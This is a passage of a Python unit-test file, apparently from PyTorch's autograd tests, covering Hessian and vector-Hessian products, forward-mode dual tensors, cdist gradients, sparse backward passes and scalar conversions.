return tuple(el_lvl2 for el_lvl1 in inp for el_lvl2 in el_lvl1)
gradcheck(lambda *inp: flatten(autogradF.hessian(add_pow_reducer, inp, create_graph=True, vectorize=vectorize)), inputs)
gradgradcheck(lambda *inp: flatten(autogradF.hessian(add_pow_reducer, inp, create_graph=True, vectorize=vectorize)), inputs)
def foo(x, y):
x = x.cos()
val, hess = autogradF.hessian(add_pow_reducer, (x, y), create_graph=True, vectorize=vectorize)
res = val[0].cos().sum() + val[1].cos().sum() + hess[0].cos().sum()
res = res + hess[1].cos().sum() + x.cos().sum() + y.cos().sum()
return res
gradcheck(foo, inputs)
gradgradcheck(foo, inputs)
def test_hessian_create_graph(self):
self._test_hessian_create_graph(vectorize=False)
def test_hessian_create_graph_vectorize(self):
self._test_hessian_create_graph(vectorize=True)
def test_vhp_err_check(self):
def foo(a):
return 3 * a.narrow(0, 0, 3).exp().sum()
def bar(a):
return 3 * a.narrow(0, 0, 3), "bar"
def bar2(a):
return 3 * a.narrow(0, 0, 3)
inp = torch.rand(4)
v = torch.rand(4)
with self.assertRaisesRegex(TypeError, "The inputs given to vhp must be either a Tensor"):
res = autogradF.vhp(foo, (inp, 2), v)
with self.assertRaisesRegex(TypeError, "The outputs of the user-provided function given to vhp must"):
res = autogradF.vhp(bar, inp, v)
err_msg_out = "The Tensor returned by the function given to vhp should contain a single element"
with self.assertRaisesRegex(RuntimeError, err_msg_out):
res = autogradF.vhp(bar2, inp, v)
with self.assertRaisesRegex(RuntimeError, "v has invalid size:"):
res = autogradF.vhp(foo, inp, torch.rand(5))
with self.assertRaisesRegex(TypeError, "The v given to vhp must be either a Tensor or a tuple of Tensors"):
res = autogradF.vhp(foo, inp, (v, 2))
res = autogradF.vhp(foo, inp, v)
self._assert_same_struct(res[1], inp)
def foo(a, b):
return (3 * b.narrow(0, 0, 3) * a.narrow(0, 0, 3)).sum()
inp = (torch.rand(4), torch.rand(5))
v = (torch.rand(4), torch.rand(5))
res = autogradF.vhp(foo, inp, v)
self._assert_same_struct(res[1], inp)
def test_vhp_err_check_strict(self):
def foo(a):
return a.detach().sum()
def bar(a):
# Make a non-leaf Tensor that requires_grad but that is not connected to the input
return a.long().float().requires_grad_().clone().sum()
def bar2(a):
# A Linear function for which the jacobian is independent of the input
return (3 * a).sum()
inp = torch.rand(4)
v = torch.rand(4)
with self.assertRaisesRegex(RuntimeError, "Output 0 of the user-provided function does not require gradients."):
res = autogradF.vhp(foo, inp, v, strict=True)
res = autogradF.vhp(foo, inp, v, strict=False)
self._assert_same_struct(res[1], inp)
self.assertEqual(res[1].abs().sum(), 0.)
with self.assertRaisesRegex(RuntimeError, "The output of the user-provided function is independent of input 0"):
res = autogradF.vhp(bar, inp, v, strict=True)
res = autogradF.vhp(bar, inp, v, strict=False)
self._assert_same_struct(res[1], inp)
self.assertEqual(res[1].abs().sum(), 0.)
with self.assertRaisesRegex(RuntimeError, "jacobian of the user-provided function with respect to input 0 is"):
res = autogradF.vhp(bar2, inp, v, strict=True)
res = autogradF.vhp(bar2, inp, v, strict=False)
self._assert_same_struct(res[1], inp)
self.assertEqual(res[1].abs().sum(), 0.)
def test_vhp_no_grad(self):
def reducer(x):
return x.exp().sum()
inputs = torch.rand(4, 4)
v = torch.ones(4, 4)
with torch.no_grad():
res = autogradF.vhp(reducer, inputs, v)
self.assertIsNone(res[0].grad_fn)
self.assertIsNone(res[1].grad_fn)
self.assertNotEqual(res[1], torch.zeros(4, 4))
with torch.no_grad():
res = autogradF.vhp(reducer, inputs, v, create_graph=True)
self.assertIsNotNone(res[0].grad_fn)
self.assertIsNotNone(res[1].grad_fn)
self.assertNotEqual(res[1], torch.zeros(4, 4))
def test_vhp_output(self):
def foo(a):
return 3 * a.narrow(0, 0, 3).exp().sum()
inputs = torch.rand(4, 4)
v = torch.ones(4, 4)
res = autogradF.vhp(foo, inputs, v)
self._assert_same_struct(res[1], inputs)
self.assertIsNone(res[0].grad_fn)
self.assertIsNone(res[1].grad_fn)
def bar(a, b):
return (a + 3 * b.narrow(0, 0, 3)).exp().sum()
inputs = (torch.rand(3), torch.rand(4))
v = (torch.ones(3), torch.ones(4))
out, vhp_val = autogradF.vhp(bar, inputs, v)
self._assert_same_struct(vhp_val, inputs)
self.assertIsNone(out.grad_fn)
self.assertIsNone(vhp_val[0].grad_fn)
self.assertIsNone(vhp_val[1].grad_fn)
def test_vhp_scalar(self):
def reducer(x):
return x.sum()
inputs = torch.rand(4, 4)
v = torch.ones(4, 4)
res = autogradF.vhp(reducer, inputs, v)
self._assert_same_struct(res[1], inputs)
inputs = torch.rand([])
v = torch.rand([])
res = autogradF.vhp(reducer, inputs, v)
self._assert_same_struct(res[1], inputs)
res = autogradF.vhp(reducer, inputs)
self._assert_same_struct(res[1], inputs)
def bad_reducer(x):
return x.sum().view(1, 1, 1)
inputs = torch.rand(4, 4)
v = torch.rand(4, 4)
res = autogradF.vhp(bad_reducer, inputs, v)
self._assert_same_struct(res[1], inputs)
def test_vhp_create_graph(self):
def foo(a):
return 3 * a.narrow(0, 0, 3).exp().sum()
inputs = torch.rand(4, 4, dtype=torch.double, requires_grad=True)
v = torch.ones(4, 4, dtype=torch.double, requires_grad=True)
res = autogradF.vhp(foo, inputs, v, create_graph=True)
self._assert_same_struct(res[1], inputs)
self.assertIsNotNone(res[0].grad_fn)
self.assertIsNotNone(res[1].grad_fn)
gradcheck(lambda inp, v: autogradF.vhp(foo, inp, v, create_graph=True), (inputs, v))
gradgradcheck(lambda inp, v: autogradF.vhp(foo, inp, v, create_graph=True), (inputs, v))
def bar(a, b):
return (a + 3 * b.narrow(0, 0, 3)).exp().sum()
inputs = (torch.rand(3, dtype=torch.double, requires_grad=True),
torch.rand(4, dtype=torch.double, requires_grad=True))
v = (torch.ones(3, dtype=torch.double, requires_grad=True),
torch.ones(4, dtype=torch.double, requires_grad=True))
out, vhp_val = autogradF.vhp(bar, inputs, v, create_graph=True)
self._assert_same_struct(vhp_val, inputs)
self.assertIsNotNone(out.grad_fn)
self.assertIsNotNone(vhp_val[0].grad_fn)
self.assertIsNotNone(vhp_val[1].grad_fn)
gradcheck(lambda *args: autogradF.vhp(bar, args[:2], args[2:], create_graph=True)[1], inputs + v)
gradgradcheck(lambda *args: autogradF.vhp(bar, args[:2], args[2:], create_graph=True)[1], inputs + v)
def foo(*args):
x, y = args[:2]
v = args[2:]
x = x.cos()
val, grad = autogradF.vhp(bar, (x, y), v, create_graph=True)
return val.cos() + grad[0].cos().sum() + grad[1].cos() + x.cos().sum() + y.cos()
gradcheck(foo, inputs + v)
gradgradcheck(foo, inputs + v)
def test_hvp_err_check(self):
def foo(a):
return 3 * a.narrow(0, 0, 3).exp().sum()
def bar(a):
return 3 * a.narrow(0, 0, 3), "bar"
def bar2(a):
return 3 * a.narrow(0, 0, 3)
inp = torch.rand(4)
v = torch.rand(4)
res = autogradF.hvp(foo, inp, v)
with self.assertRaisesRegex(TypeError, "The inputs given to hvp must be either a Tensor"):
res = autogradF.hvp(foo, (inp, 2), v)
with self.assertRaisesRegex(TypeError, "The outputs of the user-provided function given to hvp must"):
res = autogradF.hvp(bar, inp, v)
err_msg_out = "The Tensor returned by the function given to hvp should contain a single element"
with self.assertRaisesRegex(RuntimeError, err_msg_out):
res = autogradF.hvp(bar2, inp, v)
with self.assertRaisesRegex(RuntimeError, "v has invalid size:"):
res = autogradF.hvp(foo, inp, torch.rand(5))
with self.assertRaisesRegex(TypeError, "The v given to hvp must be either a Tensor or a tuple of Tensors"):
res = autogradF.hvp(foo, inp, (v, 2))
res = autogradF.hvp(foo, inp, v)
self._assert_same_struct(res[1], inp)
def foo(a, b):
return (3 * b.narrow(0, 0, 3) * a.narrow(0, 0, 3)).sum()
inp = (torch.rand(4), torch.rand(5))
v = (torch.rand(4), torch.rand(5))
res = autogradF.hvp(foo, inp, v)
self._assert_same_struct(res[1], inp)
def test_hvp_err_check_strict(self):
def foo(a):
return a.detach().sum()
def bar(a):
# Make a non-leaf Tensor that requires_grad but that is not connected to the input
return a.long().float().requires_grad_().clone().sum()
def bar2(a):
# A Linear function for which the jacobian is independent of the input
return (3 * a).sum()
inp = torch.rand(4)
v = torch.rand(4)
with self.assertRaisesRegex(RuntimeError, "Output 0 of the user-provided function does not require gradients."):
res = autogradF.hvp(foo, inp, v, strict=True)
res = autogradF.hvp(foo, inp, v, strict=False)
self._assert_same_struct(res[1], inp)
self.assertEqual(res[1].abs().sum(), 0.)
with self.assertRaisesRegex(RuntimeError, "The output of the user-provided function is independent of input 0"):
res = autogradF.hvp(bar, inp, v, strict=True)
res = autogradF.hvp(bar, inp, v, strict=False)
self._assert_same_struct(res[1], inp)
self.assertEqual(res[1].abs().sum(), 0.)
with self.assertRaisesRegex(RuntimeError, "jacobian of the user-provided function with respect to input 0 is"):
res = autogradF.hvp(bar2, inp, v, strict=True)
res = autogradF.hvp(bar2, inp, v, strict=False)
self._assert_same_struct(res[1], inp)
self.assertEqual(res[1].abs().sum(), 0.)
def test_hvp_no_grad(self):
def reducer(x):
return x.exp().sum()
inputs = torch.rand(4, 4)
v = torch.ones(4, 4)
with torch.no_grad():
res = autogradF.hvp(reducer, inputs, v)
self.assertIsNone(res[0].grad_fn)
self.assertIsNone(res[1].grad_fn)
self.assertNotEqual(res[1], torch.zeros(4, 4))
with torch.no_grad():
res = autogradF.hvp(reducer, inputs, v, create_graph=True)
self.assertIsNotNone(res[0].grad_fn)
self.assertIsNotNone(res[1].grad_fn)
self.assertNotEqual(res[1], torch.zeros(4, 4))
def test_hvp_output(self):
def foo(a):
return 3 * a.narrow(0, 0, 3).exp().sum()
inputs = torch.rand(4, 4)
v = torch.ones(4, 4)
res = autogradF.hvp(foo, inputs, v)
self._assert_same_struct(res[1], inputs)
self.assertIsNone(res[0].grad_fn)
self.assertIsNone(res[1].grad_fn)
def bar(a, b):
return (a + 3 * b.narrow(0, 0, 3)).exp().sum()
inputs = (torch.rand(3), torch.rand(4))
v = (torch.ones(3), torch.ones(4))
out, hvp_val = autogradF.hvp(bar, inputs, v)
self._assert_same_struct(hvp_val, inputs)
self.assertIsNone(out.grad_fn)
self.assertIsNone(hvp_val[0].grad_fn)
self.assertIsNone(hvp_val[1].grad_fn)
def test_hvp_scalar(self):
def reducer(x):
return x.exp().sum()
inputs = torch.rand(4, 4)
v = torch.ones(4, 4)
res = autogradF.hvp(reducer, inputs, v)
self._assert_same_struct(res[1], inputs)
inputs = torch.rand([])
v = torch.rand([])
res = autogradF.hvp(reducer, inputs, v)
self._assert_same_struct(res[1], inputs)
res = autogradF.hvp(reducer, inputs)
self._assert_same_struct(res[1], inputs)
def bad_reducer(x):
return x.exp().sum().view(1, 1, 1)
inputs = torch.rand(4, 4)
v = torch.rand(4, 4)
res = autogradF.hvp(bad_reducer, inputs, v)
self._assert_same_struct(res[1], inputs)
def test_hvp_create_graph(self):
def foo(a):
return 3 * a.narrow(0, 0, 3).exp().sum()
inputs = torch.rand(4, 4, dtype=torch.double, requires_grad=True)
v = torch.ones(4, 4, dtype=torch.double, requires_grad=True)
res = autogradF.hvp(foo, inputs, v, create_graph=True)
self._assert_same_struct(res[1], inputs)
self.assertIsNotNone(res[0].grad_fn)
self.assertIsNotNone(res[1].grad_fn)
gradcheck(lambda inp, v: autogradF.hvp(foo, inp, v, create_graph=True), (inputs, v))
gradgradcheck(lambda inp, v: autogradF.hvp(foo, inp, v, create_graph=True), (inputs, v))
def bar(a, b):
return (a + 3 * b.narrow(0, 0, 3)).exp().sum()
inputs = (torch.rand(3, dtype=torch.double, requires_grad=True),
torch.rand(4, dtype=torch.double, requires_grad=True))
v = (torch.ones(3, dtype=torch.double, requires_grad=True),
torch.ones(4, dtype=torch.double, requires_grad=True))
out, hvp_val = autogradF.hvp(bar, inputs, v, create_graph=True)
self._assert_same_struct(hvp_val, inputs)
self.assertIsNotNone(out.grad_fn)
self.assertIsNotNone(hvp_val[0].grad_fn)
self.assertIsNotNone(hvp_val[1].grad_fn)
gradcheck(lambda *args: autogradF.hvp(bar, args[:2], args[2:], create_graph=True)[1], inputs + v)
gradgradcheck(lambda *args: autogradF.hvp(bar, args[:2], args[2:], create_graph=True)[1], inputs + v)
def foo(*args):
x, y = args[:2]
v = args[2:]
x = x.cos()
val, grad = autogradF.hvp(bar, (x, y), v, create_graph=True)
return val.cos() + grad[0].cos().sum() + grad[1].cos() + x.cos().sum() + y.cos()
gradcheck(foo, inputs + v)
gradgradcheck(foo, inputs + v)
def test_jacobian_match_vjp_jvp(self):
def foo(x):
return x ** 3 + x.sum()
inputs = torch.rand(4)
v = torch.rand(4)
jac = autogradF.jacobian(foo, inputs)
jvp = autogradF.jvp(foo, inputs, v)[1]
vjp = autogradF.vjp(foo, inputs, v)[1]
self.assertEqual(jvp, torch.mm(jac, v.unsqueeze(1)).squeeze(1))
self.assertEqual(vjp, torch.mm(v.unsqueeze(0), jac).squeeze(0))
def test_hessian_match_vhp_hvp(self):
def foo(a):
return 3 * a.narrow(0, 0, 3).exp().sum()
inputs = torch.rand(4)
v = torch.rand(4)
hes = autogradF.hessian(foo, inputs)
hvp = autogradF.hvp(foo, inputs, v)[1]
vhp = autogradF.vhp(foo, inputs, v)[1]
self.assertEqual(hvp, torch.mm(hes, v.unsqueeze(1)).squeeze(1))
self.assertEqual(vhp, torch.mm(v.unsqueeze(0), hes).squeeze(0))
class TestAutogradForwardMode(TestCase):
def tearDown(self):
# Ensure that a failing test won't make others fail
while fwAD._current_level >= 0:
fwAD.exit_dual_level()
super().tearDown()
def test_forward_level_cleanup(self):
def get_tensor_and_weak_ref():
# Create a new Tensor and weak reference
t = torch.rand(2, requires_grad=True)
return t, torch._C._WeakTensorRef(t)
# Sanity check that the helper function works as expected
t, t_ref = get_tensor_and_weak_ref()
self.assertFalse(t_ref.expired())
del t
self.assertTrue(t_ref.expired())
# Main test code
foo = torch.rand(2)
with fwAD.dual_level():
tangent, tangent_ref = get_tensor_and_weak_ref()
self.assertFalse(tangent_ref.expired())
dual = fwAD.make_dual(foo, tangent)
self.assertFalse(tangent_ref.expired())
# Make sure that the tangent we provided has been re-used as is
self.assertTrue(fwAD.unpack_dual(dual)[1] is tangent)
# Make sure that dual is keeping the tangent alive
del tangent
self.assertFalse(tangent_ref.expired())
# Make sure that the dual level does not keep the c++
# version of the tangent alive
del dual
self.assertTrue(tangent_ref.expired())
def test_size_check(self):
foo = torch.rand(2)
tangent = torch.rand(3)
with fwAD.dual_level():
with self.assertRaisesRegex(RuntimeError, "Trying to set a forward gradient that has a different size"):
dual = fwAD.make_dual(foo, tangent)
dual = fwAD.make_dual(foo, tangent[1:])
# The following test functions want to ensure all the following behaviors:
# - Ensure that default level system in the python binding works
# - Ensure that only level 0 exists and nesting is properly disabled
# - Ensure that printing works fine
# - Ensure that basic packing/unpacking works
# - Ensure that advanced packing/unpacking works
# - For memory / version counter share
# - For backward AD (regular ops)
# - Ensure that view + inplace for both modes work fine
# - Ensure we do proper cleanup on exit of a level
def test_default_level(self):
foo = torch.rand(2)
bar = torch.rand(2)
with fwAD.dual_level():
baz = fwAD.make_dual(foo, bar)
baz_primal, baz_tangent = fwAD.unpack_dual(baz)
self.assertEqual(baz_primal, foo)
# We don't actually need to enforce that these two are the exact same python
# object, feel free to relax in the future
self.assertIs(baz_tangent, bar)
baz_primal, baz_tangent = fwAD.unpack_dual(baz)
self.assertEqual(baz_primal, foo)
self.assertEqual(baz_tangent, None)
def test_nested_level(self):
with fwAD.dual_level() as level:
# For now only level 0 exists
self.assertEqual(level, 0)
with fwAD.dual_level():
with self.assertRaisesRegex(RuntimeError, "Nested forward mode AD is not supported at the moment"):
nest_level = fwAD.enter_dual_level()
def test_print(self):
with fwAD.dual_level() as level:
a = torch.rand(3)
self.assertFalse("tangent=" in str(a))
b = fwAD.make_dual(a, torch.rand(3))
self.assertFalse("tangent=" in str(a))
self.assertTrue("tangent=" in str(b))
b_primal, b_tangent = fwAD.unpack_dual(b)
self.assertFalse("tangent=" in str(b_primal))
self.assertFalse("tangent=" in str(b_tangent))
def test_basic_packing_unpacking(self):
foo = torch.rand(2)
bar = torch.rand(2)
with fwAD.dual_level():
baz = fwAD.make_dual(foo, bar)
baz_primal, baz_tangent = fwAD.unpack_dual(baz)
self.assertEqual(baz_primal, foo)
self.assertIs(baz_tangent, bar)
# Check that packing/unpacking did not change the input
foo_primal, foo_tangent = fwAD.unpack_dual(foo)
self.assertEqual(foo_primal, foo)
self.assertIsNone(foo_tangent)
def test_advanced_packing_unpacking(self):
foo = torch.rand(2)
bar = torch.ones(2)
# Memory and version counter check
with fwAD.dual_level():
dual = fwAD.make_dual(foo, bar)
# Ensure that they are sharing memory and version counter
self.assertEqual(dual.storage().data_ptr(), foo.storage().data_ptr())
# Ensure we properly share the version counter
self.assertEqual(foo._version, dual._version)
foo.add_(1)
self.assertEqual(foo._version, dual._version)
# Unpacking should only create aliases as well
dual_primal, dual_tangent = fwAD.unpack_dual(dual)
self.assertEqual(dual_primal.storage().data_ptr(), foo.storage().data_ptr())
self.assertEqual(dual_tangent.storage().data_ptr(), bar.storage().data_ptr())
# And the tangent is actually re-used as-is so it is still the same Tensor
self.assertIs(dual_tangent, bar)
# Ensure we properly share the version counter
self.assertEqual(foo._version, dual_primal._version)
foo.add_(1)
self.assertEqual(foo._version, dual_primal._version)
self.assertEqual(bar._version, dual_tangent._version)
bar.add_(1)
self.assertEqual(bar._version, dual_tangent._version)
# backward mode check
with fwAD.dual_level():
foo.requires_grad_()
bar.requires_grad_()
# Check that backward gradients properly propagates through packing/unpacking
dual = fwAD.make_dual(foo, bar)
p, t = fwAD.unpack_dual(dual)
gfoo, gbar = torch.autograd.grad(p.sum(), (foo, bar), retain_graph=True, allow_unused=True)
self.assertEqual(gfoo, torch.ones_like(foo))
self.assertIsNone(gbar)
gfoo, gbar = torch.autograd.grad(t.sum(), (foo, bar), retain_graph=True, allow_unused=True)
self.assertIsNone(gfoo)
self.assertEqual(gbar, torch.ones_like(bar))
# Check that forward gradients are impacted by detach()
detached_dual = dual.detach()
out = detached_dual * 2
p, t = fwAD.unpack_dual(out)
self.assertFalse(p.requires_grad)
self.assertEqual(p, foo * 2)
self.assertIsNone(t)
# Check that forward gradients are not impacted by no_grad
with torch.no_grad():
out = dual * 3
p, t = fwAD.unpack_dual(out)
self.assertFalse(p.requires_grad)
self.assertFalse(t.requires_grad)
self.assertEqual(p, foo * 3)
self.assertEqual(t, bar * 3)
# Check that forward gradients are not impacted by inplace detach
dual = dual.clone()
dual.detach_()
out = dual * 2
p, t = fwAD.unpack_dual(out)
self.assertFalse(p.requires_grad)
self.assertEqual(p, foo * 2)
self.assertIsNone(t)
def test_view_inplace_non_differentiable_views(self):
original_foo = torch.rand(2, dtype=torch.double)
original_bar = torch.ones(2, dtype=torch.double)
# Do clones to be able to compare the values updated inplace
# with the original content of these Tensors
foo = original_foo.clone()
bar = original_bar.clone()
with fwAD.dual_level():
# Note that in this test, we use "update" to mean computing the right tangent for the dual
# All the inplace operations here are expected to update the primal value of the Tensors but
# not always their tangents.
# Also all mentions of "non differentiable view" here means non forward differentiable view
# unless specified otherwise.
# See note [Forward Grad View/inplace] for more details on how these views work.
# Check that inplace ops do not update non-differentiable views
# Non differentiable view
dual = fwAD.make_dual(foo, bar)
dual *= 2
# Check that non differentiable view's tangent was not updated
self.assertIsNone(fwAD.unpack_dual(foo)[1])
# Check that the computed result is correct
self.assertEqual(bar, original_bar * 2)
self.assertEqual(fwAD.unpack_dual(dual)[1], original_bar * 2)
self.assertEqual(foo, original_foo * 2)
self.assertEqual(fwAD.unpack_dual(dual)[0], original_foo * 2)
# Other non differentiable view
dual_primal, dual_tangent = fwAD.unpack_dual(dual)
self.assertIsNone(fwAD.unpack_dual(dual_primal)[1])
self.assertIsNone(fwAD.unpack_dual(dual_tangent)[1])
dual_primal *= 2
# Ensure dual's tangent did not change
self.assertEqual(fwAD.unpack_dual(dual)[0], original_foo * 4)
self.assertEqual(fwAD.unpack_dual(dual)[1], original_bar * 2)
dual_tangent *= 2
# Ensure dual's primal did not change
self.assertEqual(fwAD.unpack_dual(dual)[0], original_foo * 4)
self.assertEqual(fwAD.unpack_dual(dual)[1], original_bar * 4)
def test_view_inplace_differentiable_views(self):
original_foo = torch.rand(2)
original_bar = torch.ones(2)
# Do clones to be able to compare the values updated inplace
# with the original content of these Tensors
foo = original_foo.clone()
bar = original_bar.clone()
with fwAD.dual_level():
# Check that inplace ops do update differentiable view but stop at non differentiable ones
# A non differentiable view
dual = fwAD.make_dual(foo, bar)
# A differentiable view
view = dual.narrow(0, 0, 1)
view *= 2
# Check that non differentiable view was not updated
self.assertIsNone(fwAD.unpack_dual(foo)[1])
# Check that differentiable view was updated
self.assertEqual(fwAD.unpack_dual(dual)[1], torch.tensor([2., 1.]))
self.assertEqual(fwAD.unpack_dual(view)[1], torch.tensor([2.]))
# Check that we track differentiable view even for Tensors that are not dual
baz = torch.rand(2)
baz += dual
self.assertEqual(fwAD.unpack_dual(baz)[1], fwAD.unpack_dual(dual)[1])
# Updates on view should as well
baz = torch.rand(2)
baz[0] = dual[0]
self.assertEqual(fwAD.unpack_dual(baz)[1][0], fwAD.unpack_dual(dual)[1][0])
# Unused values get a gradient of 0
self.assertEqual(fwAD.unpack_dual(baz)[1][1], 0.)
# Check that forward non-differentiable views do prevent gradient update
baz = torch.rand(2)
view = baz.detach()
view += dual
self.assertIsNone(fwAD.unpack_dual(baz)[1])
def test_grad_cleanup(self):
foo = torch.rand(2)
bar = torch.rand(2)
baz = torch.rand(2)
with fwAD.dual_level():
dual = fwAD.make_dual(foo, bar)
self.assertIsNone(fwAD.unpack_dual(foo)[1])
self.assertIs(fwAD.unpack_dual(dual)[1], bar)
self.assertIsNone(fwAD.unpack_dual(dual)[1])
with fwAD.dual_level():
self.assertIsNone(fwAD.unpack_dual(foo)[1])
new_dual = fwAD.make_dual(foo, baz)
dual_primal, dual_tangent = fwAD.unpack_dual(dual)
new_dual_primal, new_dual_tangent = fwAD.unpack_dual(new_dual)
self.assertEqual(dual_primal, new_dual_primal)
self.assertIsNone(dual_tangent)
self.assertEqual(new_dual_tangent, baz)
def test_detach_view_tracking(self):
# Default detach is both forward and backward non-differentiable
foo = torch.rand(2)
foo_weak = torch._C._WeakTensorRef(foo)
out = foo.detach()
del foo
self.assertTrue(foo_weak.expired())
# Generic device type autograd tests.
class TestAutogradDeviceType(TestCase):
def test_min_max_median_backprops_to_all_values(self, device):
for f in [torch.min, torch.max, torch.median, torch.nanmedian]:
x1 = torch.tensor([1., 0., 1., 0., 1., 0.], device=device, requires_grad=True)
x2 = torch.tensor([float('nan'), float('nan'), float('nan')], requires_grad=True)
for x in [x1, x2]:
y = f(x)
y.backward()
self.assertEqual(x.grad.sum(), 1.)
self.assertEqual((x.grad == 1 / 3).sum(), 3)
def test_cdist(self, device):
def _test_euclidean_large_cdist(sizex, sizey=None):
if sizey is None:
sizey = sizex
x = torch.randn(sizex, device=device, dtype=torch.float)
y = torch.randn(sizey, device=device, dtype=torch.float)
eps = 1e-6
# to avoid extremum
x = x - (((x - y) < eps).float() * 2 * eps)
x.requires_grad = True
y.requires_grad = True
dist = torch.cdist(x, y, p=2)
# Do a backward pass to check that it is valid for large
# matrices
loss = dist.sum()
loss.backward()
_test_euclidean_large_cdist((2000, 5))
# Ensure that cdist backward with p<1 does not produce NaNs
def test_cdist_grad_p_lt_1_no_nan(self, device):
for p in [0.99, 0.7, 0.5, 0.1, 0.01]:
x = torch.randn(1, 2, device=device)
y = x.clone().detach() + torch.tensor([[1., 0.]], device=device)
x.requires_grad = True
y.requires_grad = True
result = torch.cdist(x, y, p=p)
result.backward(torch.ones_like(result))
self.assertFalse(torch.isnan(x.grad).any())
self.assertFalse(torch.isnan(y.grad).any())
def test_cdist_same_inputs(self, device):
# Test to detect issues in cdist gradient calculation
# When the distances are 0
sizex = (1, 27, 32)
for p in [0, 1, 2, 3, 1.5, 2.5, float('inf')]:
x = torch.randn(sizex, device=device, dtype=torch.float)
dist_grad = torch.randn((1, 27, 27), device=device, dtype=torch.float)
y = x.clone()
eps = 1e-6
x.requires_grad = True
d = torch.cdist(x, y)
d.backward(dist_grad)
# Check that the backward passs does not contain invalid
# values such as nan or inf
assert torch.isfinite(x.grad).all()
def test_parameter_resize(self, device):
asd = torch.nn.Parameter(torch.ones(16, dtype=torch.double, device=device))
for i in range(2):
with torch.no_grad():
asd.set_(asd[1:])
asd.grad = None
m = torch.cat((asd, asd))
m.sum().backward()
@dtypes(torch.double, torch.cdouble)
def test_sparse_ctor_getter_backward(self, device, dtype):
# See NOTE [ Sparse: autograd and API ] on the expected behavior of this test
def _test(size, sparse_dim, nnz, device):
v_size = [nnz] + list(size[sparse_dim:])
i = torch.rand(sparse_dim, nnz)
i.mul_(torch.tensor(size[:sparse_dim]).unsqueeze(1).to(i))
i = i.to(torch.long)
inp = torch.randn(v_size, dtype=torch.double, device=device, requires_grad=True)
other = self.genSparseTensor(size, sparse_dim, nnz, is_uncoalesced=True, device=device,
dtype=dtype)[0]
def fn(v):
x = torch.sparse_coo_tensor(i, v, size, dtype=dtype, device=device)
y = (x + other).coalesce()
yv = y.values()
new_v = yv.tanh()
z = torch.sparse_coo_tensor(y.indices(), new_v, y.size())
return z.coalesce().values()
gradcheck(fn, (inp,), check_batched_grad=False)
# FIXME: make gradgradcheck work.
# gradgradcheck(fn, (inp,), check_batched_grad=False)
# assert that _values is non-differentiable
with self.assertRaisesRegex(RuntimeError, "does not have a grad_fn"):
other.detach().requires_grad_()._values().backward(torch.ones_like(other._values()))
for empty_i, empty_v, empty_nnz in product([True, False], repeat=3):
sparse_size = [] if empty_i else [2, 1]
dense_size = [1, 0, 2] if empty_v else [1, 2]
nnz = 0 if empty_nnz else 5
_test(sparse_size + dense_size, len(sparse_size), nnz, device)
@dtypes(torch.double, torch.cdouble)
def test_sparse_backward(self, device, dtype):
class FixedGradientFunction(Function):
@staticmethod
def forward(ctx, x, grad_x):
ctx.save_for_backward(grad_x)
return x
@staticmethod
def backward(ctx, grad_x):
saved_grad_x, = ctx.saved_tensors
return saved_grad_x, None
size = torch.Size([6, 3, 2])
i1 = torch.tensor([
[0, 3, 4],
[0, 2, 2],
], dtype=torch.long)
v1 = make_tensor([3, 2], dtype=dtype, device=device)
sparse_grad1 = torch.sparse_coo_tensor(i1, v1, size, dtype=dtype, device=device)
i2 = torch.tensor([
[0, 1, 3, 4],
[0, 1, 2, 2],
], dtype=torch.long)
v2 = make_tensor([4, 2], dtype=dtype, device=device)
sparse_grad2 = torch.sparse_coo_tensor(i2, v2, size, dtype=dtype, device=device)
dense_grad = torch.rand(size, device=device, dtype=dtype)
fn = FixedGradientFunction
# sparse first
x = torch.randn(size, dtype=dtype, device=device, requires_grad=True)
(fn.apply(x, sparse_grad1) + fn.apply(x, dense_grad) + fn.apply(x, sparse_grad2)).sum().backward()
self.assertEqual(x.grad, dense_grad + sparse_grad1 + sparse_grad2)
# dense first
x = torch.randn(size, dtype=dtype, device=device, requires_grad=True)
(fn.apply(x, dense_grad) + fn.apply(x, sparse_grad1) + fn.apply(x, sparse_grad2)).sum().backward()
self.assertEqual(x.grad, dense_grad + sparse_grad1 + sparse_grad2)
# sparse only
x = torch.randn(size, dtype=dtype, device=device, requires_grad=True)
(fn.apply(x, sparse_grad1) + fn.apply(x, sparse_grad2)).sum().backward()
self.assertEqual(x.grad, sparse_grad1 + sparse_grad2)
# autograd tests via common_method_invocations don't allow input tensors to
# be sparse (RuntimeError: gradcheck expects all tensor inputs are dense when
# check_sparse_nnz is set to False.)
def test_sparse_mask_autograd(self, device):
tensor = torch.randn(3, requires_grad=True, device=device)
mask = torch.ones(3, device=device)
mask[1] = 0
mask = mask.to_sparse()
converted = tensor.sparse_mask(mask).to_dense()
converted.sum().backward()
self.assertEqual(tensor.grad, mask.to_dense())
def test_pyscalar_conversions(self, device):
def _test_pyscalar_conversions(t, integral_conv):
# integral -> integral
l = t(torch.zeros(1, 1, 1, dtype=torch.long))
pyscalar = -12345
l[0] = pyscalar
self.assertEqual(integral_conv(l), pyscalar)
# floating point -> floating point
f = Variable(t(torch.randn(1, 1, dtype=torch.double)))
pyscalar = -12345.1
f[0] = pyscalar
self.assertEqual(float(f), pyscalar)
f[0] = nan
self.assertTrue(math.isnan(float(f)))
f[0] = inf
self.assertEqual(float(f), inf)
f[0] = -inf
self.assertEqual(float(f), -inf)
# integral -> floating point
# check we can convert something that loses precision
pyscalar = 1234567890123456789
self.assertNotEqual(pyscalar, integral_conv(float(pyscalar)))
l[0] = pyscalar
self.assertEqual(float(l), float(pyscalar))
# floating point -> integral
f[0] = nan
self.assertRaises(ValueError, lambda: integral_conv(f[0]))
f[0] = inf
self.assertRaises(OverflowError, lambda: integral_conv(f[0]))
f[0] = -inf
self.assertRaises(OverflowError, lambda: integral_conv(f[0]))
f[0] = sys.float_info.max
self.assertEqual(integral_conv(f), sys.float_info.max)
# bool, nonzero
def test_nonzero(tensor, value, expected):
tensor[0] = value
self.assertEqual(expected, bool(tensor))
self.assertEqual(expected, True if tensor else False)
test_nonzero(l, 0, False)
test_nonzero(l, -2, True)
test_nonzero(f, 0.0, False)
test_nonzero(f, sys.float_info.min, True)
test_nonzero(f, nan, bool(nan))
test_nonzero(f, inf, bool(inf))
test_nonzero(f, -inf, bool(-inf))
_test_pyscalar_conversions(lambda x: x.to(device), lambda x: int(x))
@dtypesIfCUDA(torch.half, torch.float, torch.double, torch.int8, torch.int16, torch.int32, torch.int64)
@dtypes(torch.float, torch.double, torch.int8, torch.int16, torch.int32, torch.int64)
def test_set_requires_grad_only_for_floats(self, device, dtype):
def f1():
a = torch.ones(1, dtype=dtype, device=device)
